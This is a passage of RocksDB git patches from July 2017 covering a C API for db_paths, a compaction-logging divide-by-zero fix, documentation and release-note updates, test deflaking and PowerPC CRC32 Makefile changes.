rocksdb_options_set_db_paths(rocksdb_options_t* opt, + const rocksdb_dbpath_t** dbpath_values, + size_t num_paths) { + std::vector db_paths(num_paths); + for (size_t i = 0; i < num_paths; ++i) { + db_paths[i] = dbpath_values[i]->rep; + } + opt->rep.db_paths = db_paths; +} + void rocksdb_options_set_env(rocksdb_options_t* opt, rocksdb_env_t* env) { opt->rep.env = (env ? env->rep : nullptr); } @@ -2789,6 +2804,17 @@ size_t rocksdb_cache_get_pinned_usage(rocksdb_cache_t* cache) { return cache->rep->GetPinnedUsage(); } +rocksdb_dbpath_t* rocksdb_dbpath_create(const char* path, uint64_t target_size) { + rocksdb_dbpath_t* result = new rocksdb_dbpath_t; + result->rep.path = std::string(path); + result->rep.target_size = target_size; + return result; +} + +void rocksdb_dbpath_destroy(rocksdb_dbpath_t* dbpath) { + delete dbpath; +} + rocksdb_env_t* rocksdb_create_default_env() { rocksdb_env_t* result = new rocksdb_env_t; result->rep = Env::Default(); diff --git a/db/c_test.c b/db/c_test.c index 57f19aa9686..4bdf89bee52 100644 --- a/db/c_test.c +++ b/db/c_test.c @@ -41,6 +41,7 @@ static char dbname[200]; static char sstfilename[200]; static char dbbackupname[200]; static char dbcheckpointname[200]; +static char dbpathname[200]; static void StartPhase(const char* name) { fprintf(stderr, "=== Test %s\n", name); @@ -351,6 +352,7 @@ int main(int argc, char** argv) { rocksdb_t* db; rocksdb_comparator_t* cmp; rocksdb_cache_t* cache; + rocksdb_dbpath_t *dbpath; rocksdb_env_t* env; rocksdb_options_t* options; rocksdb_compactoptions_t* coptions; @@ -385,8 +387,14 @@ int main(int argc, char** argv) { GetTempDir(), ((int)geteuid())); + snprintf(dbpathname, sizeof(dbpathname), + "%s/rocksdb_c_test-%d-dbpath", + GetTempDir(), + ((int) geteuid())); + StartPhase("create_objects"); cmp = rocksdb_comparator_create(NULL, CmpDestroy, CmpCompare, CmpName); + dbpath = rocksdb_dbpath_create(dbpathname, 1024 * 1024); env = rocksdb_create_default_env(); cache = rocksdb_cache_create_lru(100000); @@ -1440,6 +1448,18 @@ int main(int argc, char** argv) { CheckNoError(err); } + // Simple sanity check that options setting db_paths work. + StartPhase("open_db_paths"); + { + rocksdb_close(db); + rocksdb_destroy_db(options, dbname, &err); + + const rocksdb_dbpath_t* paths[1] = {dbpath}; + rocksdb_options_set_db_paths(options, paths, 1); + db = rocksdb_open(options, dbname, &err); + CheckNoError(err); + } + StartPhase("cleanup"); rocksdb_close(db); rocksdb_options_destroy(options); @@ -1449,6 +1469,7 @@ int main(int argc, char** argv) { rocksdb_compactoptions_destroy(coptions); rocksdb_cache_destroy(cache); rocksdb_comparator_destroy(cmp); + rocksdb_dbpath_destroy(dbpath); rocksdb_env_destroy(env); fprintf(stderr, "PASS\n"); diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index 34364deac09..2d33560390d 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -82,6 +82,7 @@ typedef struct rocksdb_compactionfiltercontext_t typedef struct rocksdb_compactionfilterfactory_t rocksdb_compactionfilterfactory_t; typedef struct rocksdb_comparator_t rocksdb_comparator_t; +typedef struct rocksdb_dbpath_t rocksdb_dbpath_t; typedef struct rocksdb_env_t rocksdb_env_t; typedef struct rocksdb_fifo_compaction_options_t rocksdb_fifo_compaction_options_t; typedef struct rocksdb_filelock_t rocksdb_filelock_t; @@ -713,6 +714,9 @@ extern ROCKSDB_LIBRARY_API void rocksdb_options_set_error_if_exists( rocksdb_options_t*, unsigned char); extern ROCKSDB_LIBRARY_API void rocksdb_options_set_paranoid_checks( rocksdb_options_t*, unsigned char); +extern ROCKSDB_LIBRARY_API void rocksdb_options_set_db_paths(rocksdb_options_t*, + const rocksdb_dbpath_t** path_values, + size_t num_paths); extern ROCKSDB_LIBRARY_API void rocksdb_options_set_env(rocksdb_options_t*, rocksdb_env_t*); extern ROCKSDB_LIBRARY_API void rocksdb_options_set_info_log(rocksdb_options_t*, @@ -1089,6 +1093,11 @@ rocksdb_cache_get_usage(rocksdb_cache_t* cache); extern ROCKSDB_LIBRARY_API size_t rocksdb_cache_get_pinned_usage(rocksdb_cache_t* cache); +/* DBPath */ + +extern ROCKSDB_LIBRARY_API rocksdb_dbpath_t* rocksdb_dbpath_create(const char* path, uint64_t target_size); +extern ROCKSDB_LIBRARY_API void rocksdb_dbpath_destroy(rocksdb_dbpath_t*); + /* Env */ extern ROCKSDB_LIBRARY_API rocksdb_env_t* rocksdb_create_default_env(); From ea8ad4f6780509ef50a3e0e051aed0ae4a0a1d22 Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Mon, 24 Jul 2017 11:53:03 -0700 Subject: [PATCH 034/205] Fix compaction div by zero logging Summary: We will divide by zero if `stats.micros` is zero, just add a simple check This happens sometimes during running tests and UBSAN complains Closes https://github.com/facebook/rocksdb/pull/2631 Differential Revision: D5481455 Pulled By: IslamAbdelRahman fbshipit-source-id: 69aa24e64e21de15d9e2b8009adf01675fcc6598 --- db/compaction_job.cc | 18 +++++++++++++----- 1 file changed, 13 insertions(+), 5 deletions(-) diff --git a/db/compaction_job.cc b/db/compaction_job.cc index 636cdbea183..75f5ab6c85c 100644 --- a/db/compaction_job.cc +++ b/db/compaction_job.cc @@ -594,6 +594,9 @@ Status CompactionJob::Install(const MutableCFOptions& mutable_cf_options) { double read_write_amp = 0.0; double write_amp = 0.0; + double bytes_read_per_sec = 0; + double bytes_written_per_sec = 0; + if (stats.bytes_read_non_output_levels > 0) { read_write_amp = (stats.bytes_written + stats.bytes_read_output_level + stats.bytes_read_non_output_levels) / @@ -601,17 +604,22 @@ Status CompactionJob::Install(const MutableCFOptions& mutable_cf_options) { write_amp = stats.bytes_written / static_cast(stats.bytes_read_non_output_levels); } + if (stats.micros > 0) { + bytes_read_per_sec = + (stats.bytes_read_non_output_levels + stats.bytes_read_output_level) / + static_cast(stats.micros); + bytes_written_per_sec = + stats.bytes_written / static_cast(stats.micros); + } + ROCKS_LOG_BUFFER( log_buffer_, "[%s] compacted to: %s, MB/sec: %.1f rd, %.1f wr, level %d, " "files in(%d, %d) out(%d) " "MB in(%.1f, %.1f) out(%.1f), read-write-amplify(%.1f) " "write-amplify(%.1f) %s, records in: %d, records dropped: %d\n", - cfd->GetName().c_str(), vstorage->LevelSummary(&tmp), - (stats.bytes_read_non_output_levels + stats.bytes_read_output_level) / - static_cast(stats.micros), - stats.bytes_written / static_cast(stats.micros), - compact_->compaction->output_level(), + cfd->GetName().c_str(), vstorage->LevelSummary(&tmp), bytes_read_per_sec, + bytes_written_per_sec, compact_->compaction->output_level(), stats.num_input_files_in_non_output_levels, stats.num_input_files_in_output_level, stats.num_output_files, stats.bytes_read_non_output_levels / 1048576.0, From 06f19174499ac2d63a4f529aa8375cea02e6eca4 Mon Sep 17 00:00:00 2001 From: atkawa7 Date: Mon, 24 Jul 2017 14:57:33 -0700 Subject: [PATCH 035/205] add vcpkg as an windows option Summary: Closes https://github.com/facebook/rocksdb/pull/2629 Differential Revision: D5483751 Pulled By: sagar0 fbshipit-source-id: 9719ef9edd936dbb89b8988e3f4cb912a234f00e --- INSTALL.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/INSTALL.md b/INSTALL.md index 820293a575e..04f0eb27976 100644 --- a/INSTALL.md +++ b/INSTALL.md @@ -113,6 +113,8 @@ to build a portable binary, add `PORTABLE=1` before your make commands, like thi * **Windows**: * For building with MS Visual Studio 13 you will need Update 4 installed. * Read and follow the instructions at CMakeLists.txt + * Or install via [vcpkg](https://github.com/microsoft/vcpkg) + * run `vcpkg install rocksdb` * **AIX 6.1** * Install AIX Toolbox rpms with gcc From 9b11d4345a0f01fc3de756e01460bf1b0446f326 Mon Sep 17 00:00:00 2001 From: Thi Doan Date: Mon, 24 Jul 2017 14:59:34 -0700 Subject: [PATCH 036/205] Fix broken links Summary: Fixes broken links to the introductory talk I stumbled upon while reading the documentation. Closes https://github.com/facebook/rocksdb/pull/2628 Differential Revision: D5483851 Pulled By: sagar0 fbshipit-source-id: 94aab7fb4c4ed2305680a2fbc65b14c7977af6b8 --- docs/_docs/faq.md | 2 +- docs/_docs/getting-started.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/docs/_docs/faq.md b/docs/_docs/faq.md index 6253afeea12..0887a0987f7 100644 --- a/docs/_docs/faq.md +++ b/docs/_docs/faq.md @@ -13,7 +13,7 @@ RocksDB is an embeddable persistent key-value store for fast storage. RocksDB ca RocksDB builds on [LevelDB](https://code.google.com/p/leveldb/) to be scalable to run on servers with many CPU cores, to efficiently use fast storage, to support IO-bound, in-memory and write-once workloads, and to be flexible to allow for innovation. -For the latest details, watch [Mark Callaghan’s and Igor Canadi’s talk at CMU on 10/2015](https://scs.hosted.panopto.com/Panopto/Pages/Viewer.aspx?id=f4e0eb37-ae18-468f-9248-cb73edad3e56). [Dhruba Borthakur’s introductory talk](https://github.com/facebook/rocksdb/blob/gh-pages/intro.pdf?raw=true) from the Data @ Scale 2013 conference provides some perspective about how RocksDB has evolved. +For the latest details, watch [Mark Callaghan’s and Igor Canadi’s talk at CMU on 10/2015](https://scs.hosted.panopto.com/Panopto/Pages/Viewer.aspx?id=f4e0eb37-ae18-468f-9248-cb73edad3e56). [Dhruba Borthakur’s introductory talk](https://github.com/facebook/rocksdb/blob/gh-pages-old/intro.pdf?raw=true) from the Data @ Scale 2013 conference provides some perspective about how RocksDB has evolved. ## How does performance compare? diff --git a/docs/_docs/getting-started.md b/docs/_docs/getting-started.md index 0d5360932e7..8b01dfefd45 100644 --- a/docs/_docs/getting-started.md +++ b/docs/_docs/getting-started.md @@ -11,7 +11,7 @@ The RocksDB library provides a persistent key value store. Keys and values are a The library is maintained by the Facebook Database Engineering Team, and is based on [LevelDB](https://github.com/google/leveldb), by Sanjay Ghemawat and Jeff Dean at Google. -This overview gives some simple examples of how RocksDB is used. For the story of why RocksDB was created in the first place, see [Dhruba Borthakur’s introductory talk](https://github.com/facebook/rocksdb/blob/gh-pages/intro.pdf?raw=true) from the Data @ Scale 2013 conference. +This overview gives some simple examples of how RocksDB is used. For the story of why RocksDB was created in the first place, see [Dhruba Borthakur’s introductory talk](https://github.com/facebook/rocksdb/blob/gh-pages-old/intro.pdf?raw=true) from the Data @ Scale 2013 conference. ## Opening A Database From 5e731a1382587eb163c533d80ab3544726bd9ed8 Mon Sep 17 00:00:00 2001 From: Andres Suarez Date: Tue, 25 Jul 2017 04:23:10 -0700 Subject: [PATCH 037/205] Remove unused rocksdb arcanist lib Differential Revision: D5470179 fbshipit-source-id: 475ad3b6a85ead5f8abddefddc607353ea8680af --- .deprecated_arcconfig | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 .deprecated_arcconfig diff --git a/.deprecated_arcconfig b/.deprecated_arcconfig deleted file mode 100644 index 6cf07ffacdd..00000000000 --- a/.deprecated_arcconfig +++ /dev/null @@ -1,17 +0,0 @@ -{ - "project_id" : "rocksdb", - "conduit_uri" : "https://phabricator.fb.com/api/", - "copyright_holder" : "Facebook", - "load" : [ - "arcanist_util" - ], - "lint.engine" : "FacebookFbcodeLintEngine", - "lint.engine.single.linter" : "FbcodeCppLinter", - "unit.engine" : "FacebookFbcodeUnitTestEngine", - "arcanist_configuration" : "FacebookArcanistConfiguration", - "base" : "git:HEAD^, hg:.^", - "git.default-relative-commit" : "HEAD^", - "git:arc.feature.start.default" : "origin/master", - "arc.feature.start.default" : "master", - "history.immutable" : false -} From 277f6f23d43aea930702a5e8f697c97e90fa81d8 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 25 Jul 2017 10:17:10 -0700 Subject: [PATCH 038/205] Release note for partitioned index/filters Summary: Closes https://github.com/facebook/rocksdb/pull/2637 Differential Revision: D5489751 Pulled By: maysamyabandeh fbshipit-source-id: 0298f8960d4f86ce67959616615beee4d802c2e4 --- HISTORY.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/HISTORY.md b/HISTORY.md index 7d98443720a..9d8468c6e28 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -12,6 +12,8 @@ * RateLimiter support for throttling background reads, or throttling the sum of background reads and writes. This can give more predictable I/O usage when compaction reads more data than it writes, e.g., due to lots of deletions. * [Experimental] FIFO compaction with TTL support. It can be enabled by setting CompactionOptionsFIFO.ttl > 0. * Introduce `EventListener::OnBackgroundError()` callback. Users can implement it to be notified of errors causing the DB to enter read-only mode, and optionally override them. +* Partitioned Index/Filters exiting the experimental mode. To enable partitioned indexes set index_type to kTwoLevelIndexSearch and to further enable partitioned filters set partition_filters to true. To configure the partition size set metadata_block_size. + ### Bug Fixes * Fix discarding empty compaction output files when `DeleteRange()` is used together with subcompactions. From 2b259c9d496af4c2a48a6664d9df32010f594264 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 25 Jul 2017 11:33:07 -0700 Subject: [PATCH 039/205] Lower num of iterations in DeadlockCycle test Summary: Currently this test times out with tsan. This is likely due to decreased speed with tsan. By lowering the number of iterations we can still catch a bug as the test is run regularly and multiple runs of the test is equivalent with running the test with more iterations. Closes https://github.com/facebook/rocksdb/pull/2639 Differential Revision: D5490549 Pulled By: maysamyabandeh fbshipit-source-id: bd69c42a9728d337ac95a06a401088384e51731a --- utilities/transactions/transaction_test.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index ce01388f8a8..148f1c41c24 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -543,7 +543,7 @@ TEST_P(TransactionTest, DeadlockCycle) { TEST_P(TransactionTest, DeadlockStress) { const uint32_t NUM_TXN_THREADS = 10; const uint32_t NUM_KEYS = 100; - const uint32_t NUM_ITERS = 100000; + const uint32_t NUM_ITERS = 10000; WriteOptions write_options; ReadOptions read_options; From 30edff308ea49b65dc18d1da82ba3ba889028a21 Mon Sep 17 00:00:00 2001 From: Andrew Gallagher Date: Tue, 25 Jul 2017 12:02:44 -0700 Subject: [PATCH 040/205] buckification: remove explicit `-msse*` compiler flags Summary: These are implied by default platform flags, in particular, `-march=corei7`. Reviewed By: pixelb Differential Revision: D5485414 fbshipit-source-id: 85f1329c71fa81a604760844187cc73877fb40e9 --- TARGETS | 2 -- 1 file changed, 2 deletions(-) diff --git a/TARGETS b/TARGETS index c6c0de48bc0..4124eec4e99 100644 --- a/TARGETS +++ b/TARGETS @@ -6,8 +6,6 @@ REPO_PATH = TARGETS_PATH[(TARGETS_PATH.find('fbcode/') + len('fbcode/')):] + "/" BUCK_BINS = "buck-out/gen/" + REPO_PATH TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh" rocksdb_compiler_flags = [ - "-msse", - "-msse4.2", "-fno-builtin-memcmp", "-DROCKSDB_PLATFORM_POSIX", "-DROCKSDB_LIB_IO_POSIX", From addbd279c271e987778d20e9a6191fa19023be6d Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 25 Jul 2017 12:18:17 -0700 Subject: [PATCH 041/205] 5.6.1 release blog post Summary: 5.6.1 release blog post Closes https://github.com/facebook/rocksdb/pull/2638 Differential Revision: D5491168 Pulled By: yiwu-arbug fbshipit-source-id: 14e3a92a03684afa4bd19bfb3ffb053cc09f5d4a --- ...2017-07-25-rocksdb-5-6-1-released.markdown | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 docs/_posts/2017-07-25-rocksdb-5-6-1-released.markdown diff --git a/docs/_posts/2017-07-25-rocksdb-5-6-1-released.markdown b/docs/_posts/2017-07-25-rocksdb-5-6-1-released.markdown new file mode 100644 index 00000000000..3b54ffd5ad8 --- /dev/null +++ b/docs/_posts/2017-07-25-rocksdb-5-6-1-released.markdown @@ -0,0 +1,22 @@ +--- +title: RocksDB 5.6.1 Released! +layout: post +author: yiwu +category: blog +--- + +### Public API Change +* Scheduling flushes and compactions in the same thread pool is no longer supported by setting `max_background_flushes=0`. Instead, users can achieve this by configuring their high-pri thread pool to have zero threads. See https://github.com/facebook/rocksdb/wiki/Thread-Pool for more details. +* Replace `Options::max_background_flushes`, `Options::max_background_compactions`, and `Options::base_background_compactions` all with `Options::max_background_jobs`, which automatically decides how many threads to allocate towards flush/compaction. +* options.delayed_write_rate by default take the value of options.rate_limiter rate. +* Replace global variable `IOStatsContext iostats_context` with `IOStatsContext* get_iostats_context()`; replace global variable `PerfContext perf_context` with `PerfContext* get_perf_context()`. + +### New Features +* Change ticker/histogram statistics implementations to use core-local storage. This improves aggregation speed compared to our previous thread-local approach, particularly for applications with many threads. See http://rocksdb.org/blog/2017/05/14/core-local-stats.html for more details. +* Users can pass a cache object to write buffer manager, so that they can cap memory usage for memtable and block cache using one single limit. +* Flush will be triggered when 7/8 of the limit introduced by write_buffer_manager or db_write_buffer_size is triggered, so that the hard threshold is hard to hit. See https://github.com/facebook/rocksdb/wiki/Write-Buffer-Manager for more details. +* Introduce WriteOptions.low_pri. If it is true, low priority writes will be throttled if the compaction is behind. See https://github.com/facebook/rocksdb/wiki/Low-Priority-Write for more details. +* `DB::IngestExternalFile()` now supports ingesting files into a database containing range deletions. + +### Bug Fixes +* Shouldn't ignore return value of fsync() in flush. From fe1a5559f3ef8fd1e915385a9673a19f0bfc7a6b Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 25 Jul 2017 16:40:21 -0700 Subject: [PATCH 042/205] Fix flaky write_callback_test Summary: The test is failing occasionally on the assert: `ASSERT_TRUE(writer->state == WriteThread::State::STATE_INIT)`. This is because the test don't make the leader wait for long enough before updating state for its followers. The patch move the update to `threads_waiting` to the end of `WriteThread::JoinBatchGroup:Wait` callback to avoid this happening. Also adding `WriteThread::JoinBatchGroup:Start` and have each thread wait there while another thread is linking to the linked-list. This is to make the check of `is_leader` more deterministic. Also changing two while-loops of `compare_exchange_strong` to plain `fetch_add`, to make it look cleaner. Closes https://github.com/facebook/rocksdb/pull/2640 Differential Revision: D5491525 Pulled By: yiwu-arbug fbshipit-source-id: 6e897f122082bd6f98e6d51b31a25e5fd0a3fb82 --- db/write_callback_test.cc | 54 ++++++++++++++++++++++++++------------- db/write_thread.cc | 3 ++- 2 files changed, 38 insertions(+), 19 deletions(-) diff --git a/db/write_callback_test.cc b/db/write_callback_test.cc index 9edf1c1581e..d2bf30a0930 100644 --- a/db/write_callback_test.cc +++ b/db/write_callback_test.cc @@ -16,7 +16,6 @@ #include "rocksdb/db.h" #include "rocksdb/write_batch.h" #include "port/port.h" -#include "util/logging.h" #include "util/random.h" #include "util/sync_point.h" #include "util/testharness.h" @@ -107,6 +106,10 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { std::vector> kvs_; }; + // In each scenario we'll launch multiple threads to write. + // The size of each array equals to number of threads, and + // each boolean in it denote whether callback of corresponding + // thread should succeed or fail. std::vector> write_scenarios = { {true}, {false}, @@ -145,23 +148,37 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { db_impl = dynamic_cast(db); ASSERT_TRUE(db_impl); - std::atomic threads_waiting(0); + // Writers that have called JoinBatchGroup. + std::atomic threads_joining(0); + // Writers that have linked to the queue + std::atomic threads_linked(0); + // Writers that pass WriteThread::JoinBatchGroup:Wait sync-point. + std::atomic threads_verified(0); + std::atomic seq(db_impl->GetLatestSequenceNumber()); ASSERT_EQ(db_impl->GetLatestSequenceNumber(), 0); + rocksdb::SyncPoint::GetInstance()->SetCallBack( + "WriteThread::JoinBatchGroup:Start", [&](void*) { + uint64_t cur_threads_joining = threads_joining.fetch_add(1); + // Wait for the last joined writer to link to the queue. + // In this way the writers link to the queue one by one. + // This allows us to confidently detect the first writer + // who increases threads_linked as the leader. + while (threads_linked.load() < cur_threads_joining) { + } + }); + + // Verification once writers call JoinBatchGroup. rocksdb::SyncPoint::GetInstance()->SetCallBack( "WriteThread::JoinBatchGroup:Wait", [&](void* arg) { - uint64_t cur_threads_waiting = 0; + uint64_t cur_threads_linked = threads_linked.fetch_add(1); bool is_leader = false; bool is_last = false; // who am i - do { - cur_threads_waiting = threads_waiting.load(); - is_leader = (cur_threads_waiting == 0); - is_last = (cur_threads_waiting == write_group.size() - 1); - } while (!threads_waiting.compare_exchange_strong( - cur_threads_waiting, cur_threads_waiting + 1)); + is_leader = (cur_threads_linked == 0); + is_last = (cur_threads_linked == write_group.size() - 1); // check my state auto* writer = reinterpret_cast(arg); @@ -185,8 +202,10 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { !write_group.back().callback_.should_fail_); } - // wait for friends - while (threads_waiting.load() < write_group.size()) { + threads_verified.fetch_add(1); + // Wait here until all verification in this sync-point + // callback finish for all writers. + while (threads_verified.load() < write_group.size()) { } }); @@ -211,17 +230,20 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { std::atomic thread_num(0); std::atomic dummy_key(0); + + // Each write thread create a random write batch and write to DB + // with a write callback. std::function write_with_callback_func = [&]() { uint32_t i = thread_num.fetch_add(1); Random rnd(i); // leaders gotta lead - while (i > 0 && threads_waiting.load() < 1) { + while (i > 0 && threads_verified.load() < 1) { } // loser has to lose while (i == write_group.size() - 1 && - threads_waiting.load() < write_group.size() - 1) { + threads_verified.load() < write_group.size() - 1) { } auto& write_op = write_group.at(i); @@ -231,11 +253,7 @@ TEST_F(WriteCallbackTest, WriteWithCallbackTest) { // insert some keys for (uint32_t j = 0; j < rnd.Next() % 50; j++) { // grab unique key - char my_key = 0; - do { - my_key = dummy_key.load(); - } while ( - !dummy_key.compare_exchange_strong(my_key, my_key + 1)); + char my_key = dummy_key.fetch_add(1); string skey(5, my_key); string sval(10, my_key); diff --git a/db/write_thread.cc b/db/write_thread.cc index 7063469967b..4a9fc1406bf 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -269,8 +269,9 @@ void WriteThread::CompleteFollower(Writer* w, WriteGroup& write_group) { static WriteThread::AdaptationContext jbg_ctx("JoinBatchGroup"); void WriteThread::JoinBatchGroup(Writer* w) { - + TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:Start", w); assert(w->batch != nullptr); + bool linked_as_leader = LinkOne(w, &newest_writer_); if (linked_as_leader) { SetState(w, STATE_GROUP_LEADER); From 30b58cf71a7a0f3c89889f8040829db1978f5240 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 25 Jul 2017 18:36:29 -0700 Subject: [PATCH 043/205] Remove the orphan assert on !need_log_sync Summary: We initially had disabled support for write_options.sync when concurrent_prepare_ is set. We later added this support but the statement that asserts this combination is not used was left there. This patch cleans it up. Closes https://github.com/facebook/rocksdb/pull/2642 Differential Revision: D5496101 Pulled By: maysamyabandeh fbshipit-source-id: becbc503446f2a51bee24cc861958c090c724ec2 --- db/db_impl_write.cc | 1 - 1 file changed, 1 deletion(-) diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index f52bce611a9..b93dd6f8faa 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -230,7 +230,6 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, need_log_dir_sync, last_sequence + 1); } } else { - assert(!need_log_sync && !need_log_dir_sync); if (status.ok() && !write_options.disableWAL) { PERF_TIMER_GUARD(write_wal_time); // LastToBeWrittenSequence is increased inside WriteToWAL under From 2289d381153890e715718f6215909bdfc0e1224c Mon Sep 17 00:00:00 2001 From: Kamalalochana Subbaiah Date: Wed, 26 Jul 2017 09:33:07 -0700 Subject: [PATCH 044/205] CRC32 Power Optimization Changes Summary: Support for PowerPC Architecture Detecting AltiVec Support Closes https://github.com/facebook/rocksdb/pull/2353 Differential Revision: D5210948 Pulled By: siying fbshipit-source-id: 859a8c063d37697addd89ba2b8a14e5efd5d24bf --- Makefile | 77 +++- db/db_test_util.cc | 7 +- src.mk | 10 + tools/db_stress.cc | 16 +- util/crc32c.cc | 69 ++- util/crc32c_ppc.c | 95 ++++ util/crc32c_ppc.h | 23 + util/crc32c_ppc_asm.S | 753 ++++++++++++++++++++++++++++++ util/crc32c_ppc_constants.h | 893 ++++++++++++++++++++++++++++++++++++ util/ppc-opcode.h | 31 ++ 10 files changed, 1949 insertions(+), 25 deletions(-) create mode 100644 util/crc32c_ppc.c create mode 100644 util/crc32c_ppc.h create mode 100644 util/crc32c_ppc_asm.S create mode 100644 util/crc32c_ppc_constants.h create mode 100644 util/ppc-opcode.h diff --git a/Makefile b/Makefile index c40d741d7a8..c89e3a20449 100644 --- a/Makefile +++ b/Makefile @@ -96,6 +96,18 @@ OPT += -momit-leaf-frame-pointer endif endif +ifeq (,$(shell $(CXX) -fsyntax-only -maltivec -xc /dev/null 2>&1)) +CXXFLAGS += -DHAS_ALTIVEC +CFLAGS += -DHAS_ALTIVEC +HAS_ALTIVEC=1 +endif + +ifeq (,$(shell $(CXX) -fsyntax-only -mcpu=power8 -xc /dev/null 2>&1)) +CXXFLAGS += -DHAVE_POWER8 +CFLAGS += -DHAVE_POWER8 +HAVE_POWER8=1 +endif + # if we're compiling for release, compile without debug code (-DNDEBUG) and # don't treat warnings as errors ifeq ($(DEBUG_LEVEL),0) @@ -305,9 +317,9 @@ util/build_version.cc: FORCE else mv -f $@-t $@; fi endif -LIBOBJECTS = $(LIB_SOURCES:.cc=.o) -LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.o) -MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.o) +LIBOBJECTS = $(LIB_SOURCES:.cc=.cc.o) $(LIB_SOURCES_C:.c=.c.o) $(LIB_SOURCES_ASM:.S=.S.o) +LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.cc.o) +MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.cc.o) GTEST = $(GTEST_DIR)/gtest/gtest-all.o TESTUTIL = ./util/testutil.o @@ -555,14 +567,27 @@ $(SHARED2): $(SHARED4) $(SHARED3): $(SHARED4) ln -fs $(SHARED4) $(SHARED3) endif +SHARED_CC_OBJECTS = $(LIB_SOURCES:.cc=.cc.o) +SHARED_C_OBJECTS = $(LIB_SOURCES_C:.c=.c.o) +SHARED_ASM_OBJECTS = $(LIB_SOURCES_ASM:.S=.S.o) -shared_libobjects = $(patsubst %,shared-objects/%,$(LIBOBJECTS)) +SHARED_CC_LIBOBJECTS = $(patsubst %.cc.o,shared-objects/%.cc.o,$(SHARED_CC_OBJECTS)) +SHARED_C_LIBOBJECTS = $(patsubst %.c.o,shared-objects/%.c.o,$(SHARED_C_OBJECTS)) +SHARED_ASM_LIBOBJECTS = $(patsubst %.S.o,shared-objects/%.S.o,$(SHARED_ASM_OBJECTS)) + +shared_libobjects = $(SHARED_CC_LIBOBJECTS) $(SHARED_C_LIBOBJECTS) $(SHARED_ASM_LIBOBJECTS) CLEAN_FILES += shared-objects -$(shared_libobjects): shared-objects/%.o: %.cc +$(SHARED_CC_LIBOBJECTS): shared-objects/%.cc.o: %.cc + $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ + +$(SHARED_C_LIBOBJECTS): shared-objects/%.c.o: %.c $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ -$(SHARED4): $(shared_libobjects) +$(SHARED_ASM_LIBOBJECTS): shared-objects/%.S.o: %.S + $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ + +$(SHARED4): $(shared_libobjects) $(CXX) $(PLATFORM_SHARED_LDFLAGS)$(SHARED3) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) $(shared_libobjects) $(LDFLAGS) -o $@ endif # PLATFORM_SHARED_EXT @@ -1642,12 +1667,26 @@ rocksdbjavastaticpublishcentral: mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH).jar # A version of each $(LIBOBJECTS) compiled with -fPIC -java_libobjects = $(patsubst %,jl/%,$(LIBOBJECTS)) +JAVA_CC_OBJECTS = $(SHARED_CC_OBJECTS) +JAVA_C_OBJECTS = $(SHARED_C_OBJECTS) +JAVA_ASM_OBJECTS = $(SHARED_ASM_OBJECTS) + +JAVA_CC_LIBOBJECTS = $(patsubst %.cc.o,jl/%.cc.o,$(JAVA_CC_OBJECTS)) +JAVA_C_LIBOBJECTS = $(patsubst %.c.o,jl/%.c.o,$(JAVA_C_OBJECTS)) +JAVA_ASM_LIBOBJECTS = $(patsubst %.S.o,jl/%.S.o,$(JAVA_ASM_OBJECTS)) +java_libobjects = $(JAVA_CC_LIBOBJECTS) $(JAVA_C_LIBOBJECTS) $(JAVA_ASM_LIBOBJECTS) CLEAN_FILES += jl -$(java_libobjects): jl/%.o: %.cc +$(JAVA_CC_LIBOBJECTS): jl/%.cc.o: %.cc + $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) + +$(JAVA_C_LIBOBJECTS): jl/%.c.o: %.c + $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) + +$(JAVA_ASM_LIBOBJECTS): jl/%.S.o: %.S $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) + rocksdbjava: $(java_libobjects) $(AM_V_GEN)cd java;$(MAKE) javalib; $(AM_V_at)rm -f 